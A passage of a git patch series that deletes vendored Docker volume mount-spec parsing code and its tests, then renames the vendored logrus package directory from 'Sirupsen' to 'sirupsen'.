absolute", - "../": "mount path must be absolute", - "/:../": "mount path must be absolute", - "/:path": "mount path must be absolute", - ":": "invalid volume specification", - "/tmp:": "invalid volume specification", - ":test": "invalid volume specification", - ":/test": "invalid volume specification", - "tmp:": "invalid volume specification", - ":test:": "invalid volume specification", - "::": "invalid volume specification", - ":::": "invalid volume specification", - "/tmp:::": "invalid volume specification", - ":/tmp::": "invalid volume specification", - "/path:rw": "invalid volume specification", - "/path:ro": "invalid volume specification", - "/rw:rw": "invalid volume specification", - "path:ro": "invalid volume specification", - "/path:/path:sw": `invalid mode`, - "/path:/path:rwz": `invalid mode`, - } - } - - for _, path := range valid { - if _, err := ParseMountRaw(path, "local"); err != nil { - t.Fatalf("ParseMountRaw(`%q`) should succeed: error %q", path, err) - } - } - - for path, expectedError := range invalid { - if mp, err := ParseMountRaw(path, "local"); err == nil { - t.Fatalf("ParseMountRaw(`%q`) should have failed validation. Err '%v' - MP: %v", path, err, mp) - } else { - if !strings.Contains(err.Error(), expectedError) { - t.Fatalf("ParseMountRaw(`%q`) error should contain %q, got %v", path, expectedError, err.Error()) - } - } - } -} - -// testParseMountRaw is a structure used by TestParseMountRawSplit for -// specifying test cases for the ParseMountRaw() function. 
-type testParseMountRaw struct { - bind string - driver string - expDest string - expSource string - expName string - expDriver string - expRW bool - fail bool -} - -func TestParseMountRawSplit(t *testing.T) { - var cases []testParseMountRaw - if runtime.GOOS == "windows" { - cases = []testParseMountRaw{ - {`c:\:d:`, "local", `d:`, `c:\`, ``, "", true, false}, - {`c:\:d:\`, "local", `d:\`, `c:\`, ``, "", true, false}, - // TODO Windows post TP5 - Add readonly support {`c:\:d:\:ro`, "local", `d:\`, `c:\`, ``, "", false, false}, - {`c:\:d:\:rw`, "local", `d:\`, `c:\`, ``, "", true, false}, - {`c:\:d:\:foo`, "local", `d:\`, `c:\`, ``, "", false, true}, - {`name:d::rw`, "local", `d:`, ``, `name`, "local", true, false}, - {`name:d:`, "local", `d:`, ``, `name`, "local", true, false}, - // TODO Windows post TP5 - Add readonly support {`name:d::ro`, "local", `d:`, ``, `name`, "local", false, false}, - {`name:c:`, "", ``, ``, ``, "", true, true}, - {`driver/name:c:`, "", ``, ``, ``, "", true, true}, - } - } else { - cases = []testParseMountRaw{ - {"/tmp:/tmp1", "", "/tmp1", "/tmp", "", "", true, false}, - {"/tmp:/tmp2:ro", "", "/tmp2", "/tmp", "", "", false, false}, - {"/tmp:/tmp3:rw", "", "/tmp3", "/tmp", "", "", true, false}, - {"/tmp:/tmp4:foo", "", "", "", "", "", false, true}, - {"name:/named1", "", "/named1", "", "name", "", true, false}, - {"name:/named2", "external", "/named2", "", "name", "external", true, false}, - {"name:/named3:ro", "local", "/named3", "", "name", "local", false, false}, - {"local/name:/tmp:rw", "", "/tmp", "", "local/name", "", true, false}, - {"/tmp:tmp", "", "", "", "", "", true, true}, - } - } - - for i, c := range cases { - t.Logf("case %d", i) - m, err := ParseMountRaw(c.bind, c.driver) - if c.fail { - if err == nil { - t.Fatalf("Expected error, was nil, for spec %s\n", c.bind) - } - continue - } - - if m == nil || err != nil { - t.Fatalf("ParseMountRaw failed for spec '%s', driver '%s', error '%v'", c.bind, c.driver, err.Error()) - 
continue - } - - if m.Destination != c.expDest { - t.Fatalf("Expected destination '%s, was %s', for spec '%s'", c.expDest, m.Destination, c.bind) - } - - if m.Source != c.expSource { - t.Fatalf("Expected source '%s', was '%s', for spec '%s'", c.expSource, m.Source, c.bind) - } - - if m.Name != c.expName { - t.Fatalf("Expected name '%s', was '%s' for spec '%s'", c.expName, m.Name, c.bind) - } - - if m.Driver != c.expDriver { - t.Fatalf("Expected driver '%s', was '%s', for spec '%s'", c.expDriver, m.Driver, c.bind) - } - - if m.RW != c.expRW { - t.Fatalf("Expected RW '%v', was '%v' for spec '%s'", c.expRW, m.RW, c.bind) - } - } -} - -func TestParseMountSpec(t *testing.T) { - type c struct { - input mount.Mount - expected MountPoint - } - testDir, err := ioutil.TempDir("", "test-mount-config") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(testDir) - - cases := []c{ - {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath, ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath}}, - {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath, RW: true}}, - {mount.Mount{Type: mount.TypeBind, Source: testDir + string(os.PathSeparator), Target: testDestinationPath, ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath}}, - {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath + string(os.PathSeparator), ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath}}, - {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath}, MountPoint{Type: mount.TypeVolume, Destination: testDestinationPath, RW: true, CopyData: DefaultCopyMode}}, - {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath + string(os.PathSeparator)}, MountPoint{Type: mount.TypeVolume, Destination: 
testDestinationPath, RW: true, CopyData: DefaultCopyMode}}, - } - - for i, c := range cases { - t.Logf("case %d", i) - mp, err := ParseMountSpec(c.input) - if err != nil { - t.Fatal(err) - } - - if c.expected.Type != mp.Type { - t.Fatalf("Expected mount types to match. Expected: '%s', Actual: '%s'", c.expected.Type, mp.Type) - } - if c.expected.Destination != mp.Destination { - t.Fatalf("Expected mount destination to match. Expected: '%s', Actual: '%s'", c.expected.Destination, mp.Destination) - } - if c.expected.Source != mp.Source { - t.Fatalf("Expected mount source to match. Expected: '%s', Actual: '%s'", c.expected.Source, mp.Source) - } - if c.expected.RW != mp.RW { - t.Fatalf("Expected mount writable to match. Expected: '%v', Actual: '%v'", c.expected.RW, mp.RW) - } - if c.expected.Propagation != mp.Propagation { - t.Fatalf("Expected mount propagation to match. Expected: '%v', Actual: '%s'", c.expected.Propagation, mp.Propagation) - } - if c.expected.Driver != mp.Driver { - t.Fatalf("Expected mount driver to match. Expected: '%v', Actual: '%s'", c.expected.Driver, mp.Driver) - } - if c.expected.CopyData != mp.CopyData { - t.Fatalf("Expected mount copy data to match. Expected: '%v', Actual: '%v'", c.expected.CopyData, mp.CopyData) - } - } -} diff --git a/vendor/github.com/docker/docker/volume/volume_unix.go b/vendor/github.com/docker/docker/volume/volume_unix.go deleted file mode 100644 index 0256ebb2ba..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_unix.go +++ /dev/null @@ -1,138 +0,0 @@ -// +build linux freebsd darwin solaris - -package volume - -import ( - "fmt" - "os" - "path/filepath" - "strings" - - mounttypes "github.com/docker/docker/api/types/mount" -) - -var platformRawValidationOpts = []func(o *validateOpts){ - // need to make sure to not error out if the bind source does not exist on unix - // this is supported for historical reasons, the path will be automatically - // created later. 
- func(o *validateOpts) { o.skipBindSourceCheck = true }, -} - -// read-write modes -var rwModes = map[string]bool{ - "rw": true, - "ro": true, -} - -// label modes -var labelModes = map[string]bool{ - "Z": true, - "z": true, -} - -// BackwardsCompatible decides whether this mount point can be -// used in old versions of Docker or not. -// Only bind mounts and local volumes can be used in old versions of Docker. -func (m *MountPoint) BackwardsCompatible() bool { - return len(m.Source) > 0 || m.Driver == DefaultDriverName -} - -// HasResource checks whether the given absolute path for a container is in -// this mount point. If the relative path starts with `../` then the resource -// is outside of this mount point, but we can't simply check for this prefix -// because it misses `..` which is also outside of the mount, so check both. -func (m *MountPoint) HasResource(absolutePath string) bool { - relPath, err := filepath.Rel(m.Destination, absolutePath) - return err == nil && relPath != ".." && !strings.HasPrefix(relPath, fmt.Sprintf("..%c", filepath.Separator)) -} - -// IsVolumeNameValid checks a volume name in a platform specific manner. -func IsVolumeNameValid(name string) (bool, error) { - return true, nil -} - -// ValidMountMode will make sure the mount mode is valid. -// returns if it's a valid mount mode or not. -func ValidMountMode(mode string) bool { - if mode == "" { - return true - } - - rwModeCount := 0 - labelModeCount := 0 - propagationModeCount := 0 - copyModeCount := 0 - - for _, o := range strings.Split(mode, ",") { - switch { - case rwModes[o]: - rwModeCount++ - case labelModes[o]: - labelModeCount++ - case propagationModes[mounttypes.Propagation(o)]: - propagationModeCount++ - case copyModeExists(o): - copyModeCount++ - default: - return false - } - } - - // Only one string for each mode is allowed. 
- if rwModeCount > 1 || labelModeCount > 1 || propagationModeCount > 1 || copyModeCount > 1 { - return false - } - return true -} - -// ReadWrite tells you if a mode string is a valid read-write mode or not. -// If there are no specifications w.r.t read write mode, then by default -// it returns true. -func ReadWrite(mode string) bool { - if !ValidMountMode(mode) { - return false - } - - for _, o := range strings.Split(mode, ",") { - if o == "ro" { - return false - } - } - return true -} - -func validateNotRoot(p string) error { - p = filepath.Clean(convertSlash(p)) - if p == "/" { - return fmt.Errorf("invalid specification: destination can't be '/'") - } - return nil -} - -func validateCopyMode(mode bool) error { - return nil -} - -func convertSlash(p string) string { - return filepath.ToSlash(p) -} - -func splitRawSpec(raw string) ([]string, error) { - if strings.Count(raw, ":") > 2 { - return nil, errInvalidSpec(raw) - } - - arr := strings.SplitN(raw, ":", 3) - if arr[0] == "" { - return nil, errInvalidSpec(raw) - } - return arr, nil -} - -func clean(p string) string { - return filepath.Clean(p) -} - -func validateStat(fi os.FileInfo) error { - return nil -} diff --git a/vendor/github.com/docker/docker/volume/volume_unsupported.go b/vendor/github.com/docker/docker/volume/volume_unsupported.go deleted file mode 100644 index ff9d6afa27..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_unsupported.go +++ /dev/null @@ -1,16 +0,0 @@ -// +build !linux - -package volume - -import ( - "fmt" - "runtime" - - mounttypes "github.com/docker/docker/api/types/mount" -) - -// ConvertTmpfsOptions converts *mounttypes.TmpfsOptions to the raw option string -// for mount(2). 
-func ConvertTmpfsOptions(opt *mounttypes.TmpfsOptions, readOnly bool) (string, error) { - return "", fmt.Errorf("%s does not support tmpfs", runtime.GOOS) -} diff --git a/vendor/github.com/docker/docker/volume/volume_windows.go b/vendor/github.com/docker/docker/volume/volume_windows.go deleted file mode 100644 index 22f6fc7a14..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_windows.go +++ /dev/null @@ -1,201 +0,0 @@ -package volume - -import ( - "fmt" - "os" - "path/filepath" - "regexp" - "strings" -) - -// read-write modes -var rwModes = map[string]bool{ - "rw": true, -} - -// read-only modes -var roModes = map[string]bool{ - "ro": true, -} - -var platformRawValidationOpts = []func(*validateOpts){ - // filepath.IsAbs is weird on Windows: - // `c:` is not considered an absolute path - // `c:\` is considered an absolute path - // In any case, the regex matching below ensures absolute paths - // TODO: consider this a bug with filepath.IsAbs (?) - func(o *validateOpts) { o.skipAbsolutePathCheck = true }, -} - -const ( - // Spec should be in the format [source:]destination[:mode] - // - // Examples: c:\foo bar:d:rw - // c:\foo:d:\bar - // myname:d: - // d:\ - // - // Explanation of this regex! Thanks @thaJeztah on IRC and gist for help. See - // https://gist.github.com/thaJeztah/6185659e4978789fb2b2. A good place to - // test is https://regex-golang.appspot.com/assets/html/index.html - // - // Useful link for referencing named capturing groups: - // http://stackoverflow.com/questions/20750843/using-named-matches-from-go-regex - // - // There are three match groups: source, destination and mode. 
- // - - // RXHostDir is the first option of a source - RXHostDir = `[a-z]:\\(?:[^\\/:*?"<>|\r\n]+\\?)*` - // RXName is the second option of a source - RXName = `[^\\/:*?"<>|\r\n]+` - // RXReservedNames are reserved names not possible on Windows - RXReservedNames = `(con)|(prn)|(nul)|(aux)|(com[1-9])|(lpt[1-9])` - - // RXSource is the combined possibilities for a source - RXSource = `((?P((` + RXHostDir + `)|(` + RXName + `))):)?` - - // Source. Can be either a host directory, a name, or omitted: - // HostDir: - // - Essentially using the folder solution from - // https://www.safaribooksonline.com/library/view/regular-expressions-cookbook/9781449327453/ch08s18.html - // but adding case insensitivity. - // - Must be an absolute path such as c:\path - // - Can include spaces such as `c:\program files` - // - And then followed by a colon which is not in the capture group - // - And can be optional - // Name: - // - Must not contain invalid NTFS filename characters (https://msdn.microsoft.com/en-us/library/windows/desktop/aa365247(v=vs.85).aspx) - // - And then followed by a colon which is not in the capture group - // - And can be optional - - // RXDestination is the regex expression for the mount destination - RXDestination = `(?P([a-z]):((?:\\[^\\/:*?"<>\r\n]+)*\\?))` - // Destination (aka container path): - // - Variation on hostdir but can be a drive followed by colon as well - // - If a path, must be absolute. Can include spaces - // - Drive cannot be c: (explicitly checked in code, not RegEx) - - // RXMode is the regex expression for the mode of the mount - // Mode (optional): - // - Hopefully self explanatory in comparison to above regex's. - // - Colon is not in the capture group - RXMode = `(:(?P(?i)ro|rw))?` -) - -// BackwardsCompatible decides whether this mount point can be -// used in old versions of Docker or not. -// Windows volumes are never backwards compatible. 
-func (m *MountPoint) BackwardsCompatible() bool { - return false -} - -func splitRawSpec(raw string) ([]string, error) { - specExp := regexp.MustCompile(`^` + RXSource + RXDestination + RXMode + `$`) - match := specExp.FindStringSubmatch(strings.ToLower(raw)) - - // Must have something back - if len(match) == 0 { - return nil, errInvalidSpec(raw) - } - - var split []string - matchgroups := make(map[string]string) - // Pull out the sub expressions from the named capture groups - for i, name := range specExp.SubexpNames() { - matchgroups[name] = strings.ToLower(match[i]) - } - if source, exists := matchgroups["source"]; exists { - if source != "" { - split = append(split, source) - } - } - if destination, exists := matchgroups["destination"]; exists { - if destination != "" { - split = append(split, destination) - } - } - if mode, exists := matchgroups["mode"]; exists { - if mode != "" { - split = append(split, mode) - } - } - // Fix #26329. If the destination appears to be a file, and the source is null, - // it may be because we've fallen through the possible naming regex and hit a - // situation where the user intention was to map a file into a container through - // a local volume, but this is not supported by the platform. - if matchgroups["source"] == "" && matchgroups["destination"] != "" { - validName, err := IsVolumeNameValid(matchgroups["destination"]) - if err != nil { - return nil, err - } - if !validName { - if fi, err := os.Stat(matchgroups["destination"]); err == nil { - if !fi.IsDir() { - return nil, fmt.Errorf("file '%s' cannot be mapped. Only directories can be mapped on this platform", matchgroups["destination"]) - } - } - } - } - return split, nil -} - -// IsVolumeNameValid checks a volume name in a platform specific manner. 
-func IsVolumeNameValid(name string) (bool, error) { - nameExp := regexp.MustCompile(`^` + RXName + `$`) - if !nameExp.MatchString(name) { - return false, nil - } - nameExp = regexp.MustCompile(`^` + RXReservedNames + `$`) - if nameExp.MatchString(name) { - return false, fmt.Errorf("volume name %q cannot be a reserved word for Windows filenames", name) - } - return true, nil -} - -// ValidMountMode will make sure the mount mode is valid. -// returns if it's a valid mount mode or not. -func ValidMountMode(mode string) bool { - if mode == "" { - return true - } - return roModes[strings.ToLower(mode)] || rwModes[strings.ToLower(mode)] -} - -// ReadWrite tells you if a mode string is a valid read-write mode or not. -func ReadWrite(mode string) bool { - return rwModes[strings.ToLower(mode)] || mode == "" -} - -func validateNotRoot(p string) error { - p = strings.ToLower(convertSlash(p)) - if p == "c:" || p == `c:\` { - return fmt.Errorf("destination path cannot be `c:` or `c:\\`: %v", p) - } - return nil -} - -func validateCopyMode(mode bool) error { - if mode { - return fmt.Errorf("Windows does not support copying image path content") - } - return nil -} - -func convertSlash(p string) string { - return filepath.FromSlash(p) -} - -func clean(p string) string { - if match, _ := regexp.MatchString("^[a-z]:$", p); match { - return p - } - return filepath.Clean(p) -} - -func validateStat(fi os.FileInfo) error { - if !fi.IsDir() { - return fmt.Errorf("source path must be a directory") - } - return nil -} From 182471742cffd4988aaa8dab8172ea81c1ee12cf Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 20 Jun 2018 11:49:59 +0100 Subject: [PATCH 34/69] Use correct case for sirupsen. 
--- vendor/github.com/{Sirupsen => sirupsen}/logrus/.gitignore | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/.travis.yml | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/CHANGELOG.md | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/LICENSE | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/README.md | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/alt_exit.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/alt_exit_test.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/appveyor.yml | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/doc.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/entry.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/entry_test.go | 0 .../{Sirupsen => sirupsen}/logrus/example_basic_test.go | 0 .../github.com/{Sirupsen => sirupsen}/logrus/example_hook_test.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/exported.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/formatter.go | 0 .../{Sirupsen => sirupsen}/logrus/formatter_bench_test.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/hook_test.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks.go | 0 .../{Sirupsen => sirupsen}/logrus/hooks/syslog/README.md | 0 .../{Sirupsen => sirupsen}/logrus/hooks/syslog/syslog.go | 0 .../{Sirupsen => sirupsen}/logrus/hooks/syslog/syslog_test.go | 0 .../github.com/{Sirupsen => sirupsen}/logrus/hooks/test/test.go | 0 .../{Sirupsen => sirupsen}/logrus/hooks/test/test_test.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/json_formatter.go | 0 .../{Sirupsen => sirupsen}/logrus/json_formatter_test.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/logger.go | 0 .../github.com/{Sirupsen => sirupsen}/logrus/logger_bench_test.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/logrus.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/logrus_test.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/terminal_bsd.go | 0 .../{Sirupsen => sirupsen}/logrus/terminal_check_appengine.go | 0 
.../{Sirupsen => sirupsen}/logrus/terminal_check_notappengine.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/terminal_linux.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/text_formatter.go | 0 .../{Sirupsen => sirupsen}/logrus/text_formatter_test.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/writer.go | 0 36 files changed, 0 insertions(+), 0 deletions(-) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/.gitignore (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/.travis.yml (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/CHANGELOG.md (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/LICENSE (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/README.md (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/alt_exit.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/alt_exit_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/appveyor.yml (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/doc.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/entry.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/entry_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/example_basic_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/example_hook_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/exported.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/formatter.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/formatter_bench_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hook_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks/syslog/README.md (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks/syslog/syslog.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks/syslog/syslog_test.go (100%) 
rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks/test/test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks/test/test_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/json_formatter.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/json_formatter_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/logger.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/logger_bench_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/logrus.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/logrus_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/terminal_bsd.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/terminal_check_appengine.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/terminal_check_notappengine.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/terminal_linux.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/text_formatter.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/text_formatter_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/writer.go (100%) diff --git a/vendor/github.com/Sirupsen/logrus/.gitignore b/vendor/github.com/sirupsen/logrus/.gitignore similarity index 100% rename from vendor/github.com/Sirupsen/logrus/.gitignore rename to vendor/github.com/sirupsen/logrus/.gitignore diff --git a/vendor/github.com/Sirupsen/logrus/.travis.yml b/vendor/github.com/sirupsen/logrus/.travis.yml similarity index 100% rename from vendor/github.com/Sirupsen/logrus/.travis.yml rename to vendor/github.com/sirupsen/logrus/.travis.yml diff --git a/vendor/github.com/Sirupsen/logrus/CHANGELOG.md b/vendor/github.com/sirupsen/logrus/CHANGELOG.md similarity index 100% rename from vendor/github.com/Sirupsen/logrus/CHANGELOG.md rename to vendor/github.com/sirupsen/logrus/CHANGELOG.md diff --git a/vendor/github.com/Sirupsen/logrus/LICENSE 
b/vendor/github.com/sirupsen/logrus/LICENSE similarity index 100% rename from vendor/github.com/Sirupsen/logrus/LICENSE rename to vendor/github.com/sirupsen/logrus/LICENSE diff --git a/vendor/github.com/Sirupsen/logrus/README.md b/vendor/github.com/sirupsen/logrus/README.md similarity index 100% rename from vendor/github.com/Sirupsen/logrus/README.md rename to vendor/github.com/sirupsen/logrus/README.md diff --git a/vendor/github.com/Sirupsen/logrus/alt_exit.go b/vendor/github.com/sirupsen/logrus/alt_exit.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/alt_exit.go rename to vendor/github.com/sirupsen/logrus/alt_exit.go diff --git a/vendor/github.com/Sirupsen/logrus/alt_exit_test.go b/vendor/github.com/sirupsen/logrus/alt_exit_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/alt_exit_test.go rename to vendor/github.com/sirupsen/logrus/alt_exit_test.go diff --git a/vendor/github.com/Sirupsen/logrus/appveyor.yml b/vendor/github.com/sirupsen/logrus/appveyor.yml similarity index 100% rename from vendor/github.com/Sirupsen/logrus/appveyor.yml rename to vendor/github.com/sirupsen/logrus/appveyor.yml diff --git a/vendor/github.com/Sirupsen/logrus/doc.go b/vendor/github.com/sirupsen/logrus/doc.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/doc.go rename to vendor/github.com/sirupsen/logrus/doc.go diff --git a/vendor/github.com/Sirupsen/logrus/entry.go b/vendor/github.com/sirupsen/logrus/entry.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/entry.go rename to vendor/github.com/sirupsen/logrus/entry.go diff --git a/vendor/github.com/Sirupsen/logrus/entry_test.go b/vendor/github.com/sirupsen/logrus/entry_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/entry_test.go rename to vendor/github.com/sirupsen/logrus/entry_test.go diff --git a/vendor/github.com/Sirupsen/logrus/example_basic_test.go b/vendor/github.com/sirupsen/logrus/example_basic_test.go 
similarity index 100% rename from vendor/github.com/Sirupsen/logrus/example_basic_test.go rename to vendor/github.com/sirupsen/logrus/example_basic_test.go diff --git a/vendor/github.com/Sirupsen/logrus/example_hook_test.go b/vendor/github.com/sirupsen/logrus/example_hook_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/example_hook_test.go rename to vendor/github.com/sirupsen/logrus/example_hook_test.go diff --git a/vendor/github.com/Sirupsen/logrus/exported.go b/vendor/github.com/sirupsen/logrus/exported.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/exported.go rename to vendor/github.com/sirupsen/logrus/exported.go diff --git a/vendor/github.com/Sirupsen/logrus/formatter.go b/vendor/github.com/sirupsen/logrus/formatter.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/formatter.go rename to vendor/github.com/sirupsen/logrus/formatter.go diff --git a/vendor/github.com/Sirupsen/logrus/formatter_bench_test.go b/vendor/github.com/sirupsen/logrus/formatter_bench_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/formatter_bench_test.go rename to vendor/github.com/sirupsen/logrus/formatter_bench_test.go diff --git a/vendor/github.com/Sirupsen/logrus/hook_test.go b/vendor/github.com/sirupsen/logrus/hook_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/hook_test.go rename to vendor/github.com/sirupsen/logrus/hook_test.go diff --git a/vendor/github.com/Sirupsen/logrus/hooks.go b/vendor/github.com/sirupsen/logrus/hooks.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/hooks.go rename to vendor/github.com/sirupsen/logrus/hooks.go diff --git a/vendor/github.com/Sirupsen/logrus/hooks/syslog/README.md b/vendor/github.com/sirupsen/logrus/hooks/syslog/README.md similarity index 100% rename from vendor/github.com/Sirupsen/logrus/hooks/syslog/README.md rename to vendor/github.com/sirupsen/logrus/hooks/syslog/README.md diff --git 
a/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog.go b/vendor/github.com/sirupsen/logrus/hooks/syslog/syslog.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog.go rename to vendor/github.com/sirupsen/logrus/hooks/syslog/syslog.go diff --git a/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog_test.go b/vendor/github.com/sirupsen/logrus/hooks/syslog/syslog_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog_test.go rename to vendor/github.com/sirupsen/logrus/hooks/syslog/syslog_test.go diff --git a/vendor/github.com/Sirupsen/logrus/hooks/test/test.go b/vendor/github.com/sirupsen/logrus/hooks/test/test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/hooks/test/test.go rename to vendor/github.com/sirupsen/logrus/hooks/test/test.go diff --git a/vendor/github.com/Sirupsen/logrus/hooks/test/test_test.go b/vendor/github.com/sirupsen/logrus/hooks/test/test_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/hooks/test/test_test.go rename to vendor/github.com/sirupsen/logrus/hooks/test/test_test.go diff --git a/vendor/github.com/Sirupsen/logrus/json_formatter.go b/vendor/github.com/sirupsen/logrus/json_formatter.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/json_formatter.go rename to vendor/github.com/sirupsen/logrus/json_formatter.go diff --git a/vendor/github.com/Sirupsen/logrus/json_formatter_test.go b/vendor/github.com/sirupsen/logrus/json_formatter_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/json_formatter_test.go rename to vendor/github.com/sirupsen/logrus/json_formatter_test.go diff --git a/vendor/github.com/Sirupsen/logrus/logger.go b/vendor/github.com/sirupsen/logrus/logger.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/logger.go rename to vendor/github.com/sirupsen/logrus/logger.go diff --git 
a/vendor/github.com/Sirupsen/logrus/logger_bench_test.go b/vendor/github.com/sirupsen/logrus/logger_bench_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/logger_bench_test.go rename to vendor/github.com/sirupsen/logrus/logger_bench_test.go diff --git a/vendor/github.com/Sirupsen/logrus/logrus.go b/vendor/github.com/sirupsen/logrus/logrus.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/logrus.go rename to vendor/github.com/sirupsen/logrus/logrus.go diff --git a/vendor/github.com/Sirupsen/logrus/logrus_test.go b/vendor/github.com/sirupsen/logrus/logrus_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/logrus_test.go rename to vendor/github.com/sirupsen/logrus/logrus_test.go diff --git a/vendor/github.com/Sirupsen/logrus/terminal_bsd.go b/vendor/github.com/sirupsen/logrus/terminal_bsd.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/terminal_bsd.go rename to vendor/github.com/sirupsen/logrus/terminal_bsd.go diff --git a/vendor/github.com/Sirupsen/logrus/terminal_check_appengine.go b/vendor/github.com/sirupsen/logrus/terminal_check_appengine.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/terminal_check_appengine.go rename to vendor/github.com/sirupsen/logrus/terminal_check_appengine.go diff --git a/vendor/github.com/Sirupsen/logrus/terminal_check_notappengine.go b/vendor/github.com/sirupsen/logrus/terminal_check_notappengine.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/terminal_check_notappengine.go rename to vendor/github.com/sirupsen/logrus/terminal_check_notappengine.go diff --git a/vendor/github.com/Sirupsen/logrus/terminal_linux.go b/vendor/github.com/sirupsen/logrus/terminal_linux.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/terminal_linux.go rename to vendor/github.com/sirupsen/logrus/terminal_linux.go diff --git a/vendor/github.com/Sirupsen/logrus/text_formatter.go 
